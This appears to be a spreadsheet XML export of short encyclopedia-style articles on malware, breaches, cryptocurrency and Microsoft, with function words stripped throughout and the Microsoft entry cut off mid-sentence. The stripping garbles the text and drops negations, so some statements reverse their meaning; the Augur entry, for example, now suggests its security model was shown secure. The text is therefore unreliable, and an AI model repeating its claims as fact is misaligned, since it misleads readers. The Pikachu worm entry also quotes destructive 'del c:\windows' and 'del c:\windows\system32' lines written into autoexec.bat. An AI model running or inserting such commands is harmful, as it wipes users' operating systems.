    <t>pikachu virus, sometimes referred poké virus (not confused pokérus actual pokémon games), computer worm believed first malware geared children incorporation pikachu pokémon series. released june 2000, arrived form email titled "pikachu pokemon" [sic] body e-mail containing text "pikachu friend." opening attached executable shows users image pikachu, along message stating: "between millions people around world found you. don’t forget remember every time friend!" worm appeared attachment email file named "pikachupokemon.exe".it often compared love bug, though pikachu worm noted less dangerous slower dissemination.the banned pokémon episode "electric soldier porygon" contained references computer virus, actually show one, aside imaginary scenario anthropomorphic germ (similar baikinman anpanman) shown. spread worm mainly spread microsoft outlook email attachments. email containing attached worm-program propagated infected users sending contacts user's outlook address book. website body email lead clone official pokémon.com website. possible website downloaded trojan background visited phishing website assisted spread virus. execution when user clicks attachment, pikachupokemon.exe adds lines "del c:\windows" "del c:\windows\system32" file "autoexec.bat". these commands would executed next boot, attempt delete critical directories windows operating system. however, users would given prompt asking whether wanted delete folders, since author write added lines “del c:\windows\*.* “del c:\windows\system\*.* (the switches would automatically chosen option). this defect reason pikachu worm cause damage computer systems. also iloveyou timeline notable computer viruses worms computer virus references further reading staff writer (august 2000). "pikachu virus targeting children". chicago tribune. reuters. archived original january 2013. retrieved march 2012.</t>
  </si>
  <si>
    <t>2019 Bulgarian revenue agency hack</t>
  </si>
  <si>
    <t>july 2019, massive data breach national revenue agency (nra) bulgaria revealed. hacker responsible breach sent email major bulgarian media outlets, detailing scope attack. leaked data amounted folders .csv files detailing names national identification numbers million bulgarian citizens, well records revenues, social security payments, debts, online betting data company activities dating back early 2007, recently june 2019. according researchers, nearly every adult country personal data compromised. background successive bulgarian governments spent nearly billion leva ($1.15 billion) e-government projects since 2002, producing results. national revenue agency five entities provide e-government services citizens. 2018 government report indicated level cybersecurity government entities, citing lack qualified employees public agencies noncompetitive salaries compared private sector.in 2017, personal data including addresses names million bulgarian children openly accessible ministry education website leak addressed revealed report investigative journalism website bivol.bg.serious doubts government capacity handle data continued august 2018, bulgarian commercial register, contains entire database bulgarian economy, crashed. total hard disk drive failure caused sloppy maintenance left terabytes company data inaccessible weeks, essentially halting business transactions. following crash, e-government state agency began audit software hardware used government entities. later year, cybersecurity came effect, establishing national cybersecurity system along several government positions related cybercrime accident prevention.a days hack revealed, white hacker reported serious vulnerabilities bulgarian commission personal data protection website; hacker "begged" commission issues three years. commission take action protect data, included emails phone numbers 14,000 citizens. attack july, anonymous hacker emailed bulgarian media outlets details attack carried "servers ministry finance". leak revealed gigabytes data taken national revenue agency databases. folders included .csv files, million lines, containing full names, national identification numbers, revenue figures, personal debt information, health pension payments, register online gambling website users. email also claimed entire volume data amounted folders gigabytes. message called bulgarian government "retarded", computer security "parodic", called julian assange freed.on following day, confirmed authenticity data. according agency, servers accessed rarely used refund service deals abroad, breach affected total database.the hacker deployed injection randomly collected data servers. aftermath arrest kristiyan boykov kristiyan boykov, 20-year-old employee cybersecurity company, arrested july police sofia charged breach theft personal data.according police, released data also contained lock file information attacker's computer username, matched boykov used social media. lock file, however, dated supposed time attack.boykov released july, grounds attack affected critical databases. denied carrying attack, stating police asked "uncomfortable questions", used "slight intimidation", attempted extract forced confession. lawyer announced evidence boykov "non-existent", accusation neither points specific time period even perpetrator. according boykov employers, market competitor used occasion frame cause damage company. commission personal data protection hack attempt july commission personal data protection announced unsuccessful cyber attack carried remains unknown database targeted, attacker used local wi-fi network apparently vicinity commission's headquarters. reactions government political groups industry bulgarian professionals launched online petition demanding open source software infrastructure government services. petition also demanded clarity billions spent e-government since 2002 without noticeable results. also list data breaches references</t>
  </si>
  <si>
    <t>Merkle tree</t>
  </si>
  <si>
    <t>cryptography computer science, hash tree merkle tree tree every "leaf" (node) labelled cryptographic hash data block, every node leaf (called branch, inner node, inode) labelled cryptographic hash labels child nodes. hash tree allows efficient secure verification contents large data structure. hash tree generalization hash list hash chain. demonstrating leaf node part given binary hash tree requires computing number hashes proportional logarithm number leaf nodes tree. conversely, hash list, number proportional number leaf nodes itself. merkle tree therefore efficient example cryptographic commitment scheme, root tree seen commitment leaf nodes revealed proven part original commitment. concept hash tree named ralph merkle, patented 1979. uses hash trees used verify kind data stored, handled transferred computers. they help ensure data blocks received peers peer-to-peer network received undamaged unaltered, even check peers send fake blocks. hash trees used hash-based cryptography. hash trees also used ipfs, btrfs file systems counter data degradation); protocol; apache wave protocol; mercurial distributed revision control systems; tahoe-lafs backup system; zeronet; bitcoin ethereum peer-to-peer networks; certificate transparency framework; package manager descendants like guix; number nosql systems apache cassandra, riak, dynamo. suggestions made hash trees trusted computing systems.the initial bitcoin implementation merkle trees satoshi nakamoto applies compression step hash function excessive degree, mitigated using fast merkle trees. overview hash tree tree hashes leaves (i.e., leaf nodes, sometimes also called "leafs") hashes data blocks instance, file files. nodes farther tree hashes respective children. example, picture hash result hashing concatenation hash hash 0-1. that hash hash( hash(0-0) hash(0-1) denotes concatenation. most hash tree implementations binary (two child nodes node) well many child nodes node. usually, cryptographic hash function sha-2 used hashing. hash tree needs protect unintentional damage, unsecured checksums crcs used. hash tree hash root hash master hash). before downloading file network, cases hash acquired trusted source, instance friend site known good recommendations files download. when hash available, hash tree received non-trusted source, like peer network. then, received hash tree checked trusted hash, hash tree damaged fake, another hash tree another source tried program finds matches hash.the main difference hash list branch hash tree downloaded time integrity branch checked immediately, even though whole tree available yet. example, picture, integrity data block verified immediately tree already contains hash hash hashing data block iteratively combining result hash hash finally comparing result hash. similarly, integrity data block verified tree already hash hash this advantage since efficient split files small data blocks small blocks re-downloaded damaged. hashed file big, hash tree hash list becomes fairly big. tree, small branch downloaded quickly, integrity branch checked, downloading data blocks start. second preimage attack merkle hash root indicate tree depth, enabling second-preimage attack attacker creates document original merkle hash root. example above, attacker create document containing data blocks, first hash hash 0–1, second hash hash 1-1.one simple defined certificate transparency: computing leaf node hashes, 0x00 byte prepended hash data, 0x01 prepended computing internal node hashes. limiting hash tree size prerequisite formal security proofs, helps making proofs tighter. some implementations limit tree depth using hash tree depth prefixes hashes, extracted hash chain defined valid prefix decreases step still positive leaf reached. tiger tree hash tiger tree hash widely used form hash tree. uses binary hash tree (two child nodes node), usually data block size 1024 bytes uses tiger hash.tiger tree hashes used gnutella, gnutella2, direct connect file sharing protocols file sharing applications phex, bearshare, limewire, shareaza, dc++ gtk-gnutella. example base32: r5t6y8uyryo5suxger5nmuoez5o6e4bhpp2mrfq urn: urn:tree:tiger:r5t6y8uyryo5suxger5nmuoez5o6e4bhpp2mrfq magnet: magnet:?xt=urn:tree:tiger:r5t6y8uyryo5suxger5nmuoez5o6e4bhpp2mrfq also binary tree blockchain distributed hash table hash table hash trie linked timestamping radix tree references further reading merkle tree patent 4,309,569 explains hash tree structure handle many one-time signatures tree hash exchange format (thex) detailed description tiger trees external links implementation dynamically re-sizeable binary sha-256 hash tree (merkle tree) merkle tree implementation java tiger tree hash (tth) source code schmidt tiger tree hash (tth) implementations java rhash, open source command-line tool, calculate magnet links</t>
  </si>
  <si>
    <t>List of 2020 cyberattacks on U.S. schools</t>
  </si>
  <si>
    <t>list cyberattacks schools from 2016 2019 cyberattacks u.s. school districts. microsoft security intelligence said attacks schools school districts industry. there reported cyberattacks school districts 2019. school districts allocating millions dollars computer systems support virtual learning wake covid-19 pandemic. miami-dade public schools invested $15.3 million online learning system. 2020 system hacked denial service cyber attack.the main types cyberattacks schools distributed denial service ddos attack overwhelms targets internet bandwidth, ransomware hacker takes control target's computer system demands money. 2020 reliance distance learning, schools braced cyberattacks. average cost organizations ransomware demands $730,000. legislation u.s. representative josh harder introduced bill congress entitled: protecting students cybercrimes act. bill's goal give schools million grants implement cyber security. 2019 u.s. senators gary peters rick scott also authored bill safeguard school computer systems. bill called k-12 cybersecurity act. cyberattacks schools alphabetical colleges capital university school (columbus, ohio) columbia college chicago ransomware attack michigan state university ransomware attack mexico state university school's foundation virus regis university (denver colorado) ransomware attack paid ransom. university california francisco school medicine ransomware attack paid 1.14 million university mexico school (albuquerque wallace state community college (alabama) virus also references</t>
  </si>
  <si>
    <t>Meme coin</t>
  </si>
  <si>
    <t>meme coin (also spelled memecoin) cryptocurrency originated internet meme humorous characteristic. used broadest sense critique cryptocurrency market entirety, based particular memes, "dog coins", celebrities like coinye, pump-and-dump schemes bitconnect. term often dismissive, comparing value performances cryptocurrencies mainstream ones. supporters, hand, observe meme coins reached high market capitalizations.in late 2013, dogecoin released created joke doge meme software engineers. this sparked creation several subsequent meme coins. october 2021, meme coins circulating market. notable examples include dogecoin shiba inu.in late 2021, advertisements promoting meme coin floki london subsequent investigations around promoting meme coin, considered unregulated financial product (the advertising standards authority).some countries taken steps regulate meme coins. early 2021, thailand securities exchange commission banned meme coins part crackdown digital goods clear objective substance". however, so-called meme coins devoid substance purpose. example, microcap pawthereum uses small transaction help animal charities, raising hundreds thousands dollars process. popularity meme coins surged popularity since elon musk endorsed dogecoin, first meme coins. continues post tweets dogecoin 2022, including january stated would happy meal mcdonald's live started accepting dogecoin payment. references</t>
  </si>
  <si>
    <t>Melissa (computer virus)</t>
  </si>
  <si>
    <t>melissa virus mass-mailing macro virus released around march 1999. targeted microsoft word outlook-based systems created considerable network traffic. virus would infect computers email; email titled "important message from," followed current username. upon clicking message, body would read, "here's document asked for. don't show anyone else ;)." attached word document titled "list.doc," containing list pornographic sites accompanying logins each. would mass-mail first fifty people user's contact list disable multiple safeguard features microsoft word microsoft outlook. description virus released march 1999, david smith. smith used hijacked account post virus onto internet newsgroup called "alt.sex." soon ended similar groups pornographic sites spreading corporate networks. however, virus credited kwyjibo, macro virus writer vicodins alt-f11, comparing microsoft word documents globally unique identifier. this method also used trace virus back smith. "list.doc" file contained visual basic script copied infected file template file used word custom settings default macros. recipient opened attachment, infecting file read computer storage. virus created outlook object, read first names outlook global address book, sent copy addresses read.melissa worked microsoft word microsoft word 2000 microsoft outlook email clients. microsoft outlook needed receive virus email, unable spread emails without impact virus slowed email systems overloading microsoft outlook microsoft exchange servers emails, major companies impacted included microsoft, intel corp, united states marine corps. computer emergency response team, pentagon-financed security service carnegie mellon university, reported organizations called regarding virus, indicating least 100,000 workplace computers infected. although number believed higher. estimated million email accounts hijacked virus. virus able contained within days, although took longer remove infected systems entirely. time fastest spreading email worm. arrest april 1999, smith arrested jersey collaborative effort involving fbi, jersey state police, monmouth internet, swedish computer scientist, others. they accused causing us$80 million worth damages disrupting personal computers computer networks business government.on december 1999, smith pleaded guilty second-degree charge computer theft federal charge damaging computer program releasing virus.on 2002, sentenced months federal prison fined us$5,000. also code (computer worm) morris worm slammer tuxissa timeline computer viruses worms comparison computer viruses references external links f-secure melissa page melissa virus turns scishow: worst computer viruses</t>
  </si>
  <si>
    <t>2016 Bitfinex hack</t>
  </si>
  <si>
    <t>bitfinex cryptocurrency exchange hacked august 2016 second-largest breach bitcoin exchange platform time. 119,756 bitcoin, worth us$72 million time, stolen.in february 2022, government seized portion stolen bitcoin, worth us$3.6 billion, decrypting file owned ilya lichtenstein contained addresses private keys associated stolen funds. lichtenstein wife, heather morgan, charged conspiracy launder money. history hack august 2016, bitfinex cryptocurrency exchange, based hong kong, announced suffered security breach. around 2,000 approved transactions sent single wallet user's segregated wallets. immediately thereafter, bitcoin's trading price plunged 20%, causing value stolen bitcoin us$58 million. after learning breach, bitfinex halted bitcoin withdrawals trading bitfinex said tracking hack. exchange customers, even whose accounts broken into, account balance reduced received tokens proportion losses. exchange's access u.s. dollar payments withdrawals curtailed. hack happened even though bitfinex securing funds bitgo, uses multiple-signature security. laundering small amounts money began move single wallet early 2017 marketplace alphabay launder after alphabay shuttered international enforcement fbi, money rerouted russian marketplace hydra. shutdown alphabay given enforcement access service's internal transaction logs connect pieces together.in february 2022, york couple, ilya lichtenstein (age wife heather morgan (age 31), charged authorities conspiring launder bitcoin, worth us$3.6 billion. according justice officials, lichtenstein morgan charged conspiracy launder money, maximum sentence years prison, conspiracy defraud united states carries maximum sentence five years prison. neither accused perpetrating hack. enforcement able acquire search warrant cloud storage service used lichtenstein, obtaining spreadsheet wallet addresses linked hack, passwords. wallets around 94,000 bitcoin. openness transparency blockchain, enforcement able track money; obtaining passwords allowed seize it.some funds moved towards traditional financial accounts used gold, nfts, walmart gift card spent uber rides playstation. though hundreds millions dollars converted fiat currency, bitcoin still original wallet center hack.shortly couple's arrest, netflix ordered documentary series cover story lichtenstein's morgan's alleged crimes. also history bitcoin references</t>
  </si>
  <si>
    <t>Privacy concerns regarding Google</t>
  </si>
  <si>
    <t>Pineapple Fund</t>
  </si>
  <si>
    <t>pineapple fund philanthropic project anonymous individual gave away 5,057 bitcoins charities. amount valued million december 2017. some themes supported medical research, environmental conservation, human rights psychedelic therapy. history pineapple fund announced post reddit december 2017. individual used pseudonym "pine", explained aims, goals, motivations life nothing mega rich. something else: donating majority bitcoins charitable causes". individual behind fund remained pseudonymous. application form made available website, open charities around world. speaking magazine philanthropy, founder said 10,000 applications received.after five months, total 5,104 bitcoins donated liquidated value million exchange rate volatility. donations fund's first donation million watsi, charity crowdfunding healthcare.the fund donated total million sens research foundation methuselah foundation development rejuvenation therapies based periodic repair cell tissue damage causes aging.the fund made three largest donations million givedirectly, open medicine foundation, maps.the fund donated million organ preservation alliance.the fund also donated million organizations bitgive foundation, internet archive, sustainable ocean alliance. also list bitcoin organizations references external links official website wayback machine (archived 2020-01-08)</t>
  </si>
  <si>
    <t>2020 Miami-Dade Public Schools DDoS attack</t>
  </si>
  <si>
    <t>september 2020, 2:53 edt, 16-year-old male south miami, florida arrested connection distributed denial-of-service (ddos) attacks miami-dade county public schools's computer network, fourth largest causing system crash first three days school year. occurred school system attempting conduct internet-based instruction covid-19 pandemic 2020. after monitoring addresses using network, investigators concluded teenager several foreign actors hacked system. time, school district contracted stride, inc. time known inc.) provide software necessary internet-based instruction. despite price $15.3 million, stride surprisingly susceptible attacks. consequently, school district sought help u.s. secret service investigate. method used attacks according affidavit, suspect used orbit cannon (loic) launch attacks. loic application uses ddos-style attacks disrupt websites. however, investigators teen hacker involved. numerous addresses associated attacks originating russia, ukraine, china, iraq, countries. investigators said suspect responsible eight least attacks.after accused admitted involvement, charged crime using computer defraud, third-degree felony. agencies involved investigation fbi, secret service, florida department enforcement investigating agencies. former congresswoman debbie mucarsel-powell florida's 26th congressional district formally asked briefing issue. senator marco rubio florida asked department homeland security information attacks well. also list cyberattacks u.s. schools 2020 list data breaches hit-and-run ddos hacks massachusetts institute technology ransomware references</t>
  </si>
  <si>
    <t>Michael J. Saylor</t>
  </si>
  <si>
    <t>michael saylor (born february 1965) american entrepreneur business executive, co-founded leads microstrategy, company provides business intelligence, mobile software, cloud-based services. saylor authored 2012 book mobile wave: mobile intelligence will change everything. also sole trustee saylor academy, provider free online education. 2016, saylor granted patents additional applications review.as august 2022, saylor stepped microstrategy's following loss million dollars bitcoin holdings. succeeded phong president microstrategy prior saylor stepping down. saylor company years. life saylor born lincoln, nebraska february 1965, spent early years various force bases around world, father force chief master sergeant. when saylor family settled fairborn, ohio, near wright-patterson force base.in 1983, saylor enrolled massachusetts institute technology (mit) force rotc scholarship. joined theta delta fraternity, future co-founder microstrategy, sanju bansal. graduated 1987, double major aeronautics astronautics; science, technology, society. medical condition prevented becoming pilot, instead, consulting firm, federal group, inc. 1987, focused computer simulation modeling software integration company. 1988, saylor became internal consultant dupont, developed computer models help company anticipate change markets. simulations predicted would recession many dupont's major markets 1990. microstrategy using funds dupont, saylor founded microstrategy sanju bansal, fraternity brother. company began developing software data mining, focused software business intelligence. 1992, microstrategy million contract mcdonald's develop applications analyze efficiency promotions. contract mcdonald's saylor realize company could create business intelligence software would allow companies data insights businesses.saylor took company public june 1998, initial stock offering million shares priced each. stock price doubled first trading. owns 39,521 units company worth $14,482,075. early 2000, saylor's worth reached billion, washingtonian reported wealthiest washington d.c. area.in 1996, saylor named kpmg washington high-tech entrepreneur year. 1997, ernst young named saylor software entrepreneur year, following year, herring magazine recognized entrepreneurs 1998. saylor also featured technology review "innovator under 1999.on august 2022, saylor left role became executive chairman microstrategy. phong company's president, succeeded ceo. saylor said press release, executive chairman able focus bitcoin acquisition strategy related bitcoin advocacy initiatives, phong empowered manage overall corporate operations." investigation march 2000, u.s. securities exchange commission (sec) brought charges saylor microstrategy executives company's inaccurate reporting financial results preceding years. december 2000, saylor settled without admitting wrongdoing paying $350,000 penalties personal disgorgement $8.3 million. result restatement results, company's stock declined value saylor's worth fell billion. covid-19 response criticism 3,000-word memo microstrategy employees march 2020, entitled thoughts covid-19," saylor criticized countermeasures recommended disease, saying "soul-stealing debillitating [sic] embrace notion social distancing economic hibernation" predicting worst-case scenario, global life expectancy would "click weeks." saylor also refused close microstrategy's offices unless legally required full content memo appeared reddit minutes reposted washington business journal. bitcoin investment microstrategy's quarterly earnings conference call july 2020, saylor announced intention microstrategy explore purchasing bitcoin, gold, alternative assets instead holding cash. following month, microstrategy used $250 million cash stockpile purchase 21,454 bitcoin.microstrategy later added $175 million bitcoin holdings september 2020 another million early december 2020. december 2020, microstrategy announced sold $650 million convertible senior notes, taking debt increase bitcoin holdings billion worth. december 2020, microstrategy announced total holdings include 70,470 bitcoins purchased $1.125 billion average price $15,964 bitcoin. february 2021 holdings include 90,531 bitcoins acquired $2.171 billion average price $23,985 bitcoin. saylor, controls microstrategy's shares, dismissed concerns observers move turning microstrategy bitcoin investment firm exchange-traded fund (etf).in october 2020, saylor disclosed personally held 17,732 bitcoin average purchase price $9,882. october 2021, sold bitcoin.between october november 2021, microstrategy bought 7,002 bitcoins $414.4 million cash average purchase price $59,187, bringing total holdings 121,044 bitcoins. mobile wave june 2012, saylor released mobile wave: mobile intelligence will change everything, published perseus books, discusses trends mobile technology future impact commerce, healthcare, education, developing world. book appeared york times best seller list, ranked number seven hardcover non-fiction books august 2012, ranked number five hardcover business books wall street journal's best-sellers list july 2012. saylor academy 1999, saylor established saylor foundation (later named saylor academy), sole trustee. saylor.org launched 2008 free education initiative saylor foundation. references external links michael saylor official website</t>
  </si>
  <si>
    <t>Augur (software)</t>
  </si>
  <si>
    <t>augur decentralized prediction market platform built ethereum blockchain. augur developed forecast foundation, founded 2014 jack peterson, joey krug, jeremy gardner. forecast foundation advised bernstein, founder now-defunct company intrade, ethereum founder vitalik buterin. operation augur allows user create prediction market topic.there kinds markets: categorical markets seven options; example, "will alice election?" "yes" "no" options, "who election?" five candidates options. these markets winners take all, making similar binary options.scalar markets offer spectrum numerical outcomes; example, "what closing price apple's stock january 2021?" traders "long" "short" value, i.e. result higher lower certain value. trader longs value, result money make (and similarly shorts).note "invalid" outcomes markets, help prevent scam markets ensure market questions resolutions unambiguous.to resolve markets, "reporting" fees used incentivize reporting market outcomes. augur uses erc-20 token called repv2 incentivize reporters network back reports tokens. repv2 token holders entitled trading fees generated platform. augur's security model rigorously quantified shown secure. augur runs ethereum. history after crowdfunding august 2015, project launched july 2018.soon platform launched, users created death pools assassination markets famous people.augur's user numbers dropped sharply launch 2018: daily users early july, august.in july 2018, commodity futures trading commission noted resemblance augur contracts binary options, would fall jurisdiction. augur's decentralised design allow sidestep regulatory difficulties, augur protocol allows users prediction market, developer joseph krug says "shift(s) legal responsibility bettors".in july 2020, augur released. included dramatic changes including usage stablecoin pegged dollar) trading, faster resolution market outcomes hours v1's days), user-friendly interface, making "invalid" tradeable outcome, allowing market creators affiliate fees encourage others share market, allowing creation orders without fees.forbes described augur significant leap forward world decentralized applications function similar internet without need trusted third parties. successful, profound upgrades could used place horse-bets without bookie; could mark turning point next generation internet." references further reading peterson krug zoltu williams alexander (2018). "augur: decentralized oracle prediction market platform". arxiv:1501.01042. doi:10.13140/2.1.1431.4563. s2cid 6082844. {{cite journal}}: cite journal requires |journal= (help) fröberg ingre knudsen (2018), blockchain prediction markets: analysis three organizations implementing prediction markets using blockchain technology, future blockchain prediction market (pdf), skolan elektroteknik datavetenskap (eecs)</t>
  </si>
  <si>
    <t>Mikeyy</t>
  </si>
  <si>
    <t>mikeyy name computer worm spread approximately 10,000 automated messages "tweets") across social networking microblogging website twitter.com four discrete attacks "between saturday april 2009 pacific time early monday (april 2009) morning" "identified deleted". tweets promoted website called stalkdaily.the worm written 17-year-old michael mooney operates website point vulnerabilities twitter advertising website. references</t>
  </si>
  <si>
    <t>Microsoft</t>
  </si>
  <si>
    <t>microsoft corporation american multinational technology corporation produces computer software, consumer electronics, personal computers, related services headquartered microsoft redmond campus located redmond, washington, united states. best-known software products windows line operating systems, microsoft office suite, internet explorer edge browsers. flagship hardware products xbox video game consoles microsoft surface lineup touchscreen personal computers. microsoft ranked 2020 fortune rankings largest united states corporations total revenue; world's largest software maker revenue 2016. five american information technology companies, alongside google, amazon, apple, meta. microsoft (the word portmanteau "microcomputer software") founded bill gates paul allen april 1975, develop sell basic interpreters altair 8800. rose dominate personal computer operating system market ms-dos mid-1980s, followed windows. company's 1986 initial public offering (ipo), subsequent rise share price, created three billionaires estimated 12,000 millionaires among microsoft employees. since 1990s, increasingly diversified operating system market made number corporate acquisitions, largest acquisition linkedin $26.2 billion december 2016, followed acquisition skype technologies $8.5 billion 2011.as 2015, microsoft market-dominant compatible operating system market office software suite market, although lost majority overall operating system market android. company also produces wide range consumer enterprise software desktops, laptops, tabs, gadgets, servers, including internet search (with bing), digital services market (through msn), mixed reality (hololens), cloud computing (azure), software development (visual studio). steve ballmer replaced gates 2000, later envisioned "devices services" strategy. this unfolded microsoft acquiring danger inc. 2008, entering personal computer production market first time june 2012 launch microsoft surface line tablet computers, later forming microsoft mobile acquisition nokia's devices services division. since satya nadella took 2014, company scaled back hardware instead focused cloud computing, move helped company's shares reach highest value since december 1999.earlier dethroned apple 2010, 2018 microsoft reclaimed position valuable publicly traded company world. april 2019, microsoft reached trillion-dollar market cap, becoming third u.s. public company valued trillion apple amazon respectively. 2021, microsoft fourth-highest global brand valuation. history 1972–1985: founding childhood friends bill gates paul allen sought make business using skills computer programming. 1972, founded traf-o-data, sold rudimentary computer track analyze automobile traffic data. gates enrolled harvard university allen pursued degree computer science washington state university, though later dropped work honeywell. january 1975 issue popular electronics featured micro instrumentation telemetry systems's (mits) altair 8800 microcomputer, inspired allen suggest could program basic interpreter device. gates called mits claimed working interpreter, mits requested demonstration. allen worked simulator altair gates developed interpreter, worked flawlessly demonstrated mits march 1975 albuquerque, mexico. mits agreed distribute marketing altair basic.: 108, 112–114 gates allen established microsoft april 1975, gates ceo, allen suggested name "micro-soft", short micro-computer software. august 1977, company formed agreement ascii magazine japan, resulting first international office ascii microsoft. microsoft moved headquarters bellevue, washington, january 1979.microsoft entered operating system (os) business 1980 version unix called xenix, ms-dos solidified company's dominance. awarded contract microsoft november 1980 provide version cp/m used personal computer (ibm pc). deal, microsoft purchased cp/m clone called 86-dos seattle computer products branded ms-dos, although rebranded dos. microsoft retained ownership ms-dos following release august 1981. copyrighted bios, companies reverse engineer order non-ibm hardware compatibles, restriction applied operating systems. microsoft eventually became leading operating systems vendor.: company expanded markets release microsoft mouse 1983, well publishing division named microsoft press.: paul allen resigned microsoft 1983 developing hodgkin's disease. allen claimed idea man: memoir co-founder microsoft gates wanted dilute share company diagnosed hodgkin's disease think working hard enough. allen later invested low-tech sectors, sports teams, commercial real estate, neuroscience, private space flight, more. 1985–1994: windows office microsoft released windows november 1985, graphical extension ms-dos,: 242–243, despite begun jointly developing os/2 previous august. microsoft moved headquarters bellevue redmond, washington, february 1986, went public march resulting rise stock making estimated four billionaires 12,000 millionaires microsoft employees. microsoft released version os/2 original equipment manufacturers (oems) april 1987. 1990, federal trade commission examined microsoft possible collusion partnership ibm, marking beginning decade legal clashes government. 243–244 meanwhile, company work microsoft windows heavily based copy os/2 code. shipped july 1993, modular kernel 32-bit win32 application programming interface (api), making easier port 16-bit (ms-dos-based) windows. microsoft informed windows os/2 partnership deteriorated.in 1990, microsoft introduced microsoft office suite bundled separate applications microsoft word microsoft excel.: microsoft launched windows 3.0, featuring streamlined user interface graphics improved protected mode capability intel processor, office windows became dominant respective areas.on july 1994, department justice's antitrust division filed competitive impact statement said: "beginning 1988 continuing july 1994, microsoft induced many oems execute anti-competitive 'per processor' licenses. under per-processor license, pays microsoft royalty computer sells containing particular microprocessor, whether sells computer microsoft operating system non-microsoft operating system. effect, royalty payment microsoft microsoft product used acts penalty, tax, oem's competing operating system. since 1988, microsoft's processor licenses increased." 1995–2007: foray web, windows windows xbox following bill gates' internal "internet tidal wave memo" 1995, microsoft began redefine offerings expand product line computer networking world wide web. with exceptions companies, like netscape, microsoft major established company acted fast enough part world wide practically start. other companies like borland, wordperfect, novell, lotus, much slower adapt situation, would give microsoft market dominance. company released windows august 1995, featuring pre-emptive multitasking, completely user interface novel start button, 32-bit compatibility; similar provided win32 api.: windows came bundled online service msn, first intended competitor internet, (for oems) internet explorer, browser. internet explorer bundled retail windows boxes, boxes printed team finished browser, instead included windows plus! pack. backed high-profile marketing campaign york times called "the splashiest, frenzied, expensive introduction computer product industry's history," windows quickly became success. branching markets 1996, microsoft general electric's unit created 24/7 cable news channel, msnbc. microsoft created windows 1.0, designed devices memory constraints, personal digital assistants. october 1997, justice department filed motion federal district court, stating microsoft violated agreement signed 1994 asked court stop bundling internet explorer windows.: 323–324 january 2000, bill gates handed position steve ballmer, college friend gates employee company since 1980, creating position chief software architect.: 111, various companies including microsoft formed trusted computing platform alliance october 1999 (among things) increase security protect intellectual property identifying changes hardware software. critics decried alliance enforce indiscriminate restrictions consumers software, computers behave, form digital rights management: example scenario computer secured owner, also secured owner well. april 2000, judgment handed case united states microsoft corp., calling company "abusive monopoly." microsoft later settled u.s. department justice 2004. october 2001, microsoft released windows unifying mainstream lines codebase. company released xbox later year, entering video game console market dominated sony nintendo. march 2004 european union brought antitrust legal action company, citing abused dominance windows resulting judgment €497 million ($613 million) requiring microsoft produce versions windows without windows media player: windows home edition windows professional november 2005, company's second video game console, xbox 360, released. there versions, basic version $299.99 deluxe version $399.99.increasingly present hardware business following xbox, microsoft 2006 released zune series digital media players, successor previous software platform portable media center. these expanded previous hardware commitments microsoft following original microsoft mouse 1983; 2007 company sold best-selling wired keyboard (natural ergonomic keyboard 4000), mouse (intellimouse), desktop webcam (lifecam) united states. that year company also launched surface "digital table", later renamed pixelsense. 2007–2011: microsoft azure, windows vista, windows microsoft stores released january 2007, next version windows, vista, focused features, security redesigned user interface dubbed aero. microsoft office 2007, released time, featured "ribbon" user interface significant departure predecessors. relatively strong sales products helped produce record profit 2007. european union imposed another fine €899 million ($1.4 billion) microsoft's lack compliance march 2004 judgment february 2008, saying company charged rivals unreasonable prices information workgroup backoffice servers. microsoft stated compliance "these fines past issues resolved". 2007 also creation multi-core unit microsoft, following steps server companies ibm.gates retired role chief software architect june 2008, decision announced june 2006, retaining positions related company addition advisor company projects. azure services platform, company's entry cloud computing market windows, launched october 2008. february 2009, microsoft announced intent open chain microsoft-branded retail stores, october 2009, first retail microsoft store opened scottsdale, arizona; windows officially released public. windows focus refining vista ease-of-use features performance enhancements, rather extensive reworking windows.as smartphone industry boomed late 2000s, microsoft struggled keep rivals providing modern smartphone operating system, falling behind apple google-sponsored android united states. result, 2010 microsoft revamped aging flagship mobile operating system, windows mobile, replacing windows phone released october year. used user interface design language, codenamed "metro", prominently used simple shapes, typography iconography, utilizing concept minimalism. microsoft implemented strategy software industry, providing consistent user experience across smartphones using windows phone launched alliance nokia 2011 microsoft worked closely company co-develop windows phone, remained partners long-time windows mobile htc. microsoft founding member open networking foundation started march 2011. fellow founders google, networking, yahoo!, verizon communications, deutsche telekom companies. this nonprofit organization focused providing support cloud computing initiative called software-defined networking. initiative meant speed innovation simple software changes telecommunications networks, wireless networks, data centers networking areas. 2011–2014: windows 8/8.1, xbox one, outlook.com, surface devices following release windows phone, microsoft undertook gradual rebranding product range throughout 2011 2012, corporation's logos, products, services websites adopting principles concepts metro design language. microsoft unveiled windows operating system designed power personal computers tablet computers, taipei june 2011. developer preview released september subsequently replaced consumer preview february 2012, released public may. surface unveiled june becoming first computer company's history hardware made microsoft. june microsoft paid us$1.2 billion social network yammer. july launched outlook.com webmail service compete gmail. september 2012, microsoft released windows server 2012.in july 2012, microsoft sold stake msnbc, joint venture since 1996. october microsoft announced intention launch news operation, part new-look msn, windows later month. october 2012, microsoft launched windows microsoft surface. three days later, windows phone launched. cope potential increase demand products services, microsoft opened number "holiday stores" across u.s. complement increasing number "bricks-and-mortar" microsoft stores opened 2012. march 2013, microsoft launched patent tracker.in august 2012, york city police department announced partnership microsoft development domain awareness system used police surveillance york city. kinect, motion-sensing input device made microsoft designed video game controller, first introduced november 2010, upgraded 2013 release xbox video game console. kinect's capabilities revealed 2013: ultra-wide 1080p camera, function dark infrared sensor, higher-end processing power software, ability distinguish fine movements (such thumb movement), determining user's heart rate looking face. microsoft filed patent application 2011 suggests corporation kinect camera system monitor behavior television viewers part plan make viewing experience interactive. july 2013, microsoft stocks suffered biggest one-day percentage sell-off since year 2000, fourth-quarter report raised concerns among investors poor showings windows surface tablet. microsoft suffered loss us$32 billion.in line maturing business, july 2013, microsoft announced would reorganize business four business divisions, namely operating system, apps, cloud, devices. previous divisions dissolved divisions without workforce cuts. september 2013, microsoft agreed nokia's mobile unit billion, following hood taking role cfo. 2014–2020: windows microsoft edge, hololens february 2014, steve ballmer stepped microsoft succeeded satya nadella, previously microsoft's cloud enterprise division. day, john thompson took role chairman, place bill gates, continued participate technology advisor. thompson became second chairman microsoft's history. april 2014, microsoft acquired nokia devices services $7.2 billion. this subsidiary renamed microsoft mobile september 2014, microsoft acquired video game development company mojang, best known minecraft, $2.5 billion. june 2017, microsoft acquired hexadite, israeli security firm, $100 million.on january 2015, microsoft announced release first interactive whiteboard, microsoft surface hub. july 2015, windows released, server sibling, windows server 2016, released september 2016. 2015, microsoft third largest maker mobile phones, selling million units (7.2% all). while large majority least 75%) version windows phone— phones categorized smartphones gartner time frame million windows 